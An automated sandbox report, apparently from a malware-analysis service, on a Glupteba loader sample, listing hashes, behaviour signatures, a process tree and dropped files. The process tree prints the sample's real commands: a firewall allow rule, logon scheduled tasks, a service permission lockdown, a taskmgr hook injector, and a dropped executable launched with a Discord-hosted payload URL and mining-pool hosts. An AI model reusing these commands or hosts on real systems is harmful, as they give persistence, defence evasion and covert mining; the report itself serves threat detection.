Analysis

  • max time kernel
    299s
  • max time network
    300s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    01-05-2024 22:49

General

  • Target

    31a25019889dd75ec99f4c5efbc753a0438279b96ef6dbdbb309018cf7926fa3.exe

  • Size

    4.1MB

  • MD5

    0473ef4659547c66339a72d00c0655a8

  • SHA1

    de0801690033096c5a87bfec4315a395d8bc59bd

  • SHA256

    31a25019889dd75ec99f4c5efbc753a0438279b96ef6dbdbb309018cf7926fa3

  • SHA512

    e0a41cd04df88918e08545d26f9214e3036e09048da6024097e5cdce40a386285d418de04ab4a40fcbd9a47ec1a06168245950000205180e09b08ee8729e8549

  • SSDEEP

    98304:VB+pokA3uLr67t8MVyOHX+J6fh0VTXiCNKfogoP0GUbubAei:VBc4uLrIK0u8fYNDf0GUb+Aei

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 34 IoCs
  • Windows security bypass 2 TTPs 7 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Executes dropped EXE 7 IoCs
  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 7 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 10 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 2 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\31a25019889dd75ec99f4c5efbc753a0438279b96ef6dbdbb309018cf7926fa3.exe
    "C:\Users\Admin\AppData\Local\Temp\31a25019889dd75ec99f4c5efbc753a0438279b96ef6dbdbb309018cf7926fa3.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2752
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3840
    • C:\Users\Admin\AppData\Local\Temp\31a25019889dd75ec99f4c5efbc753a0438279b96ef6dbdbb309018cf7926fa3.exe
      "C:\Users\Admin\AppData\Local\Temp\31a25019889dd75ec99f4c5efbc753a0438279b96ef6dbdbb309018cf7926fa3.exe"
      2⤵
      • Windows security bypass
      • Windows security modification
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:996
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4244
      • C:\Windows\System32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5056
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:2992
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5060
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5064
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Manipulates WinMonFS driver.
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2856
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4928
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:2208
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /delete /tn ScheduledUpdate /f
          4⤵
            PID:2068
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:304
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:716
          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:1416
          • C:\Windows\SYSTEM32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            4⤵
            • Creates scheduled task(s)
            PID:4520
          • C:\Windows\windefender.exe
            "C:\Windows\windefender.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:512
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2080
              • C:\Windows\SysWOW64\sc.exe
                sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                6⤵
                • Launches sc.exe
                • Suspicious use of AdjustPrivilegeToken
                PID:5064
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:2660
          • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
            4⤵
            • Executes dropped EXE
            PID:4976
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:624
          • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
            4⤵
            • Executes dropped EXE
            PID:4340
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:2204
          • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
            4⤵
            • Executes dropped EXE
            PID:3296
    • C:\Windows\windefender.exe
      C:\Windows\windefender.exe
      1⤵
      • Executes dropped EXE
      • Modifies data under HKEY_USERS
      PID:4548

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_quzz0oux.jrl.ps1

      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

      Filesize

      2.0MB

      MD5

      1bf850b4d9587c1017a75a47680584c4

      SHA1

      75cd4738ffc07f203c3f3356bc946fdd0bcdbe19

      SHA256

      ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955

      SHA512

      ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08

    • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

      Filesize

      2.8MB

      MD5

      713674d5e968cbe2102394be0b2bae6f

      SHA1

      90ac9bd8e61b2815feb3599494883526665cb81e

      SHA256

      f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057

      SHA512

      e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb

    • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

      Filesize

      2.0MB

      MD5

      dcb505dc2b9d8aac05f4ca0727f5eadb

      SHA1

      4f633edb62de05f3d7c241c8bc19c1e0be7ced75

      SHA256

      61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

      SHA512

      31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

      Filesize

      281KB

      MD5

      d98e33b66343e7c96158444127a117f6

      SHA1

      bb716c5509a2bf345c6c1152f6e3e1452d39d50d

      SHA256

      5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

      SHA512

      705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      1c19c16e21c97ed42d5beabc93391fc5

      SHA1

      8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

      SHA256

      1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

      SHA512

      7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

      Filesize

      18KB

      MD5

      15a002593012c1a6757f3e1103d691b0

      SHA1

      0b7bbc6b59f9462d5c50b11362e86c0764cd63e6

      SHA256

      14670e2e90b0fa88987847e8af745c064edc30b4a192fcd1f7a026796d1b502f

      SHA512

      78e6109152826c5ac7147aa058f9f4a93fd952cfd58497fdb406dc237e597bb39be8f9e9e9c1e021c25bb8df4e73869a744936f1acb5da268a43e201d3f3fb3e

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

      Filesize

      18KB

      MD5

      a87c890bfd2bb3e06a9f49cb25ac7435

      SHA1

      7ad1406605ae600475126cdb203f1d93e0c75ebc

      SHA256

      e2b2235e79a5e613cfd9b888fb569db46875b21938463dd873182627f867fc6f

      SHA512

      fc4d493afd7f48ee6764c201dfd7a98b957f36dd2fd45fd5e38ba83ce4fc421d2225e083bd1e924808a8ffbaaeddd84682c75ef5f2520a117bd02a105d2b5f50

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

      Filesize

      18KB

      MD5

      cd879e2c33669d46548b8208105aa37a

      SHA1

      1defed915929db4faba3f1282e64d393091c3bf6

      SHA256

      8d2aa2e8c6bf950260e1fdf55f24b89d95f66eb1b8d879010cff04ca84362ded

      SHA512

      f62a6d9c5f5ff2f4e7eaa447eda73dd34cfcfeaf7fe2bd01687fe6e1b19cc11d21dc161b4b3180f0b1af477a36878b60c109b0fad7ce0c469bdb427dabb0c5c0

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

      Filesize

      18KB

      MD5

      c4651c506aa440000150c2c28e560b1d

      SHA1

      26ffcaca1eecf1ec37edb2681e09b48e9e73d872

      SHA256

      1964d1af6d93b866173a6bb82fd901d10fd14c7a00e8fb445b87556255265615

      SHA512

      928de8aadf7cb1523bceb36f62310c8430db227be3f85a05a8e5ad85f06409d42a646970a946c0b6d5cccf90e6fcf7e068396266bde19cc8765fa73be7c9e23a

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

      Filesize

      18KB

      MD5

      325a5847c15aededed6bccca912b3efd

      SHA1

      3f30cd41fd8ab634e94f6b35c5ecc8847f80f67a

      SHA256

      adddfeb375bf757c76b5b97bee9dcb3c088721ba0d890e3af039ec813ef79eaa

      SHA512

      32ca2202bf20cbb6f4ed29ad9527a0404d089bf6db08d138cc0296dcd25c231c9d7c99146af5c09eb3cb8c2412359e0f900e29b7e1f326fd8157efb5de549920

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

      Filesize

      18KB

      MD5

      0f91e466a988b5b78f71a85b879e5579

      SHA1

      1886a74fd7d552d06e990c2f51ae095601a60003

      SHA256

      5f2d0397fa9d2a956b8582135c0412a356c75c7c77f9ae619bc7c482717e0b83

      SHA512

      a37be481fe0b8ef76e7e014299740c74a78f8e858d60ccd3954d9f2e50584a33db06d3b5f710dd6590f824496b5b80fd14da3e4c3cfdbb3b2eb3f813462e7b16

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

      Filesize

      18KB

      MD5

      33b8c3fc7b2a7ff0fdc357b77bd7f3e9

      SHA1

      ca030a69b1fc4a1f43fc0bc898b29e39a865bf2b

      SHA256

      da3ebaf5e22be8c1a7ab5ac3c29bb692885bc9a7c076295b966f95363ac6288b

      SHA512

      abaee33bfc0580537ce782fc3f7f8156980dddec9d5d221c28850f04be18753cad47eca67b996ec71dcf05488c447c28c42b0c2730d2a039e917da311b3d56f6

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

      Filesize

      18KB

      MD5

      420aacb300913a7378c34178b82f45b0

      SHA1

      e39bba7677b4637fea002761a063d8459f539d27

      SHA256

      18ea4f853bf86f64de10f4848cae6c62351ac6d65fb61dea4f22198b1ceeacb2

      SHA512

      c24bc19a3eb9535e8d02fe00a8d63bec6c02bbb43fa73cf8e4ff0e360c95a25fc9d7a9fcec4f5679f8dfac126fcdb1d746968907df4dd3ce3079571717e20767

    • C:\Windows\rss\csrss.exe

      Filesize

      4.1MB

      MD5

      0473ef4659547c66339a72d00c0655a8

      SHA1

      de0801690033096c5a87bfec4315a395d8bc59bd

      SHA256

      31a25019889dd75ec99f4c5efbc753a0438279b96ef6dbdbb309018cf7926fa3

      SHA512

      e0a41cd04df88918e08545d26f9214e3036e09048da6024097e5cdce40a386285d418de04ab4a40fcbd9a47ec1a06168245950000205180e09b08ee8729e8549

    • C:\Windows\windefender.exe

      Filesize

      2.0MB

      MD5

      8e67f58837092385dcf01e8a2b4f5783

      SHA1

      012c49cfd8c5d06795a6f67ea2baf2a082cf8625

      SHA256

      166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

      SHA512

      40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

    • memory/304-1283-0x0000000070620000-0x0000000070970000-memory.dmp

      Filesize

      3.3MB

    • memory/304-1261-0x0000000007410000-0x0000000007760000-memory.dmp

      Filesize

      3.3MB

    • memory/304-1263-0x00000000079C0000-0x0000000007A0B000-memory.dmp

      Filesize

      300KB

    • memory/304-1282-0x00000000705B0000-0x00000000705FB000-memory.dmp

      Filesize

      300KB

    • memory/304-1288-0x0000000008EE0000-0x0000000008F85000-memory.dmp

      Filesize

      660KB

    • memory/512-1746-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

    • memory/512-1743-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

    • memory/624-2064-0x00000000704C0000-0x000000007050B000-memory.dmp

      Filesize

      300KB

    • memory/624-2065-0x0000000070510000-0x0000000070860000-memory.dmp

      Filesize

      3.3MB

    • memory/716-1519-0x00000000705B0000-0x00000000705FB000-memory.dmp

      Filesize

      300KB

    • memory/716-1520-0x0000000070600000-0x0000000070950000-memory.dmp

      Filesize

      3.3MB

    • memory/716-1499-0x0000000007F00000-0x0000000008250000-memory.dmp

      Filesize

      3.3MB

    • memory/996-402-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/996-1017-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2204-2306-0x0000000070530000-0x0000000070880000-memory.dmp

      Filesize

      3.3MB

    • memory/2204-2305-0x00000000704C0000-0x000000007050B000-memory.dmp

      Filesize

      300KB

    • memory/2204-2285-0x0000000007410000-0x0000000007760000-memory.dmp

      Filesize

      3.3MB

    • memory/2660-1816-0x0000000070510000-0x0000000070860000-memory.dmp

      Filesize

      3.3MB

    • memory/2660-1796-0x00000000081B0000-0x00000000081FB000-memory.dmp

      Filesize

      300KB

    • memory/2660-1821-0x0000000009200000-0x00000000092A5000-memory.dmp

      Filesize

      660KB

    • memory/2660-1794-0x00000000077C0000-0x0000000007B10000-memory.dmp

      Filesize

      3.3MB

    • memory/2660-1815-0x00000000704C0000-0x000000007050B000-memory.dmp

      Filesize

      300KB

    • memory/2752-301-0x0000000004F90000-0x000000000587B000-memory.dmp

      Filesize

      8.9MB

    • memory/2752-1-0x00000000033F0000-0x00000000037ED000-memory.dmp

      Filesize

      4.0MB

    • memory/2752-300-0x0000000000400000-0x0000000000D1C000-memory.dmp

      Filesize

      9.1MB

    • memory/2752-299-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2752-3-0x0000000000400000-0x0000000000D1C000-memory.dmp

      Filesize

      9.1MB

    • memory/2752-2-0x0000000004F90000-0x000000000587B000-memory.dmp

      Filesize

      8.9MB

    • memory/2856-1780-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1772-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1755-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-2525-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1751-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-2038-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1791-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1258-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1788-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1786-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1785-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1783-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1778-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1777-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1775-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1753-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1770-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1769-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1767-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1738-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1764-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1762-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1761-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1759-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1747-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1756-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/2856-1748-0x0000000000400000-0x0000000002ED3000-memory.dmp

      Filesize

      42.8MB

    • memory/3296-2522-0x0000000000400000-0x00000000008E8000-memory.dmp

      Filesize

      4.9MB

    • memory/3296-2527-0x0000000000400000-0x00000000008E8000-memory.dmp

      Filesize

      4.9MB

    • memory/3840-280-0x000000000A5B0000-0x000000000A5B8000-memory.dmp

      Filesize

      32KB

    • memory/3840-13-0x0000000007F20000-0x0000000007F86000-memory.dmp

      Filesize

      408KB

    • memory/3840-4-0x00000000738DE000-0x00000000738DF000-memory.dmp

      Filesize

      4KB

    • memory/3840-81-0x000000000A440000-0x000000000A4E5000-memory.dmp

      Filesize

      660KB

    • memory/3840-7-0x0000000004FD0000-0x0000000005006000-memory.dmp

      Filesize

      216KB

    • memory/3840-82-0x000000000A620000-0x000000000A6B4000-memory.dmp

      Filesize

      592KB

    • memory/3840-275-0x000000000A5C0000-0x000000000A5DA000-memory.dmp

      Filesize

      104KB

    • memory/3840-8-0x0000000007780000-0x0000000007DA8000-memory.dmp

      Filesize

      6.2MB

    • memory/3840-298-0x00000000738D0000-0x0000000073FBE000-memory.dmp

      Filesize

      6.9MB

    • memory/3840-9-0x00000000738D0000-0x0000000073FBE000-memory.dmp

      Filesize

      6.9MB

    • memory/3840-10-0x00000000738D0000-0x0000000073FBE000-memory.dmp

      Filesize

      6.9MB

    • memory/3840-11-0x00000000076C0000-0x00000000076E2000-memory.dmp

      Filesize

      136KB

    • memory/3840-12-0x0000000007DB0000-0x0000000007E16000-memory.dmp

      Filesize

      408KB

    • memory/3840-14-0x0000000007F90000-0x00000000082E0000-memory.dmp

      Filesize

      3.3MB

    • memory/3840-76-0x000000000A3E0000-0x000000000A3FE000-memory.dmp

      Filesize

      120KB

    • memory/3840-15-0x0000000008450000-0x000000000846C000-memory.dmp

      Filesize

      112KB

    • memory/3840-16-0x0000000008970000-0x00000000089BB000-memory.dmp

      Filesize

      300KB

    • memory/3840-35-0x00000000094F0000-0x000000000952C000-memory.dmp

      Filesize

      240KB

    • memory/3840-66-0x00000000095B0000-0x0000000009626000-memory.dmp

      Filesize

      472KB

    • memory/3840-73-0x000000000A400000-0x000000000A433000-memory.dmp

      Filesize

      204KB

    • memory/3840-75-0x0000000070630000-0x0000000070980000-memory.dmp

      Filesize

      3.3MB

    • memory/3840-74-0x00000000705E0000-0x000000007062B000-memory.dmp

      Filesize

      300KB

    • memory/4244-326-0x0000000070770000-0x0000000070AC0000-memory.dmp

      Filesize

      3.3MB

    • memory/4244-305-0x0000000007410000-0x0000000007760000-memory.dmp

      Filesize

      3.3MB

    • memory/4244-306-0x00000000079B0000-0x00000000079FB000-memory.dmp

      Filesize

      300KB

    • memory/4244-331-0x0000000008EE0000-0x0000000008F85000-memory.dmp

      Filesize

      660KB

    • memory/4244-325-0x0000000070700000-0x000000007074B000-memory.dmp

      Filesize

      300KB

    • memory/4340-2526-0x00000000003D0000-0x0000000000C9D000-memory.dmp

      Filesize

      8.8MB

    • memory/4340-2282-0x00000000003D0000-0x0000000000C9D000-memory.dmp

      Filesize

      8.8MB

    • memory/4548-1749-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

    • memory/4548-1745-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

    • memory/4548-1752-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

    • memory/4928-1022-0x0000000008150000-0x00000000084A0000-memory.dmp

      Filesize

      3.3MB

    • memory/4928-1044-0x00000000706B0000-0x0000000070A00000-memory.dmp

      Filesize

      3.3MB

    • memory/4928-1049-0x0000000009B20000-0x0000000009BC5000-memory.dmp

      Filesize

      660KB

    • memory/4928-1043-0x0000000070660000-0x00000000706AB000-memory.dmp

      Filesize

      300KB

    • memory/4928-1024-0x0000000008610000-0x000000000865B000-memory.dmp

      Filesize

      300KB

    • memory/4976-2045-0x0000000000400000-0x00000000008E1000-memory.dmp

      Filesize

      4.9MB

    • memory/4976-2039-0x0000000000400000-0x00000000008E1000-memory.dmp

      Filesize

      4.9MB

    • memory/5060-545-0x0000000007C80000-0x0000000007FD0000-memory.dmp

      Filesize

      3.3MB

    • memory/5060-565-0x0000000070700000-0x000000007074B000-memory.dmp

      Filesize

      300KB

    • memory/5060-566-0x0000000070750000-0x0000000070AA0000-memory.dmp

      Filesize

      3.3MB

    • memory/5064-801-0x0000000070770000-0x0000000070AC0000-memory.dmp

      Filesize

      3.3MB

    • memory/5064-800-0x0000000070700000-0x000000007074B000-memory.dmp

      Filesize

      300KB